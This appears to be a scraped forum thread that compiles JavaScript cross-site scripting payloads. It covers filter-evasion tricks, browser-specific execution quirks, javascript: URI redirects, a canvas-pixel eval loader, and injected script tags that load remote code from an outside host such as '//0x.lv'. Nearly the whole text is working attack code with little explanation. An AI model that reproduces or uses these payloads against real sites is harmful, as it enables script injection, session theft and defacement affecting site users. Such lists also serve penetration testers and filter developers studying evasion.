Paid Advertising
Quote
window["alert"](1);//this["alert"],self["alert"],etc.. see references to window
Quote
self[<>alert</>](1);//JS1.6+Quote
self[<><![CDATA[alert]]></>](1);Quote
top/**/['\x61\x6c\x65\x72\x74']/**/(1);Quote
\u0061lert(1),alert\u000a(1);
Quote
(ä=#1={}&&alert)(ä);//ff only
Quote
alert.valueOf().call(self,1);
Quote
[alert.valueOf()][0].valueOf()(1);
Quote
{x/*@cc_on=alert@*/}x/*@(/xss/@*/); // ie only
Quote
({__noSuchMethod__:Function}).aaaaa$$$$$$$$$dddddddfffffff_____("alert(1)")()//ff only
Quote
//ff only
location.__noSuchMethod__=location.replace;location["javascript:alert(1)"]();
window.__noSuchMethod__=setTimeout;window["alert(2)"]();
Quote
""+{toString:alert}//code execution with no [=()], doesnt work on FF with native functions
Quote
1*({valueOf:alert})//code execution with no [=()], doesnt work on FF with native functions
Quote
a setter=alert;a="hello";// function execution without [()] ff only
Quote
eval("alert(1)");
Quote
setTimeout("alert(1)");
Quote
setInterval("alert(1)");//lots of alerts..
Quote
Function("alert(1)")();
Quote
self[(typeof prompt).replace(/^./,String.toUpperCase)]("alert(1)")();
Quote
[].constructor.constructor('alert(1)')();
Quote
execScript("alert(1)");//IE only
Quote
window[<>eval</>](name);//JS1.6+
Quote
'alert("xss")'.replace(/.*/g,eval)
Quote
with(document)body.previousSibling.appendChild(createElement('script')).src='URL'
Quote
with(document)querySelector('head').appendChild(createElement('script')).src='URL'
Quote
with(a=<script />)a.@src='URL',a.toXMLString();//FF only, generates the string only (doesn't execute)
Quote
with(document)body.previousSibling.appendChild(createElementNS('http://www.w3.org/1999/xhtml','html:script')).src='URL'
Quote
//IE only
document.createElement("html").appendChild(document.createElement("script")).text="alert('ie sucks')";
ddocument.createElement("html").appendChild(document.createElement("script")).setAttribute('src','//0x.lv');
Quote
//WebKit only (Chrome/Safari)
document.createElementNS("http://www.w3.org/1999/xhtml","html").innerHTML='<html:head><meta http-equiv="Refresh" content="0;URL=javascript:alert(/HACKED/);"></html:head>';
Quote
//FF only
document.createElement("pre").innerHTML="<img onerror='alert(1)' src='.'/>";
with(new Image)setAttribute('onerror','alert(1)'),src='.';
with(document.createElement("img"))setAttribute('onerror','alert(1)'),setAttribute('src','.');
new Option().innerHTML="<img src='.' onerror=alert(1)>";//tip: [new Option][0][name]=location.hash // name=innerHTML location.hash=<img src...
Quote
// Opera only
new Image().src="javascript:alert(1234)";
document.createElement('img').src="javascript:alert(1234)";
Quote
location='javascript:alert(1)';
Quote
location.assign('javascript:alert(1)');
Quote
location.replace('javascript:alert(1)');
Quote
// supossing the url is http://victim/asdf/#%0aalert(1) (ie only)
location.protocol='javascript';
Quote
document.URL='javascript:alert(1)';//ie
Quote
location=Namespace('javascript:\x61lert(1)').uri//ff
Quote
frameElement.src='javascript:alert(1)';/*requires to be framed in same origin (frame a page with a frame and do frames[0].frames[0].location="xss victim")*/
Quote
<meta http-equiv=refresh content=,url=xss.swf>
Quote
document.styleSheets(0).cssText=name;//IE only
<html>
<body>
<img id="i" onload="a()" src="alert.png"/>
<canvas id="c"/>
<script>
function a() {
c=document.getElementById("c"),x=c.getContext("2d"),i=document.getElementById("i")
x.drawImage(i, 0, 0),d=x.getImageData(0, 0, 3, 3),p=''
for(y in d.data) {
if(d.data[y] > 0 && d.data[y] < 255) {
p+=String.fromCharCode(d.data[y])
}
}
eval(p)
}
</script>
</body>
</html>
Quote
window.onload=function(){document.execCommand("inserthtml",0,"<img src=x onerror=alert(document.domain)>")}
setTimeout(/document.execCommand('inserthtml',0,"<img src=x onerror=alert(1)>")/.source)
Proxy.create({get:Function('\u0061l\u0065rt\u00281\u0029')})[9999]; // FF4b5pre
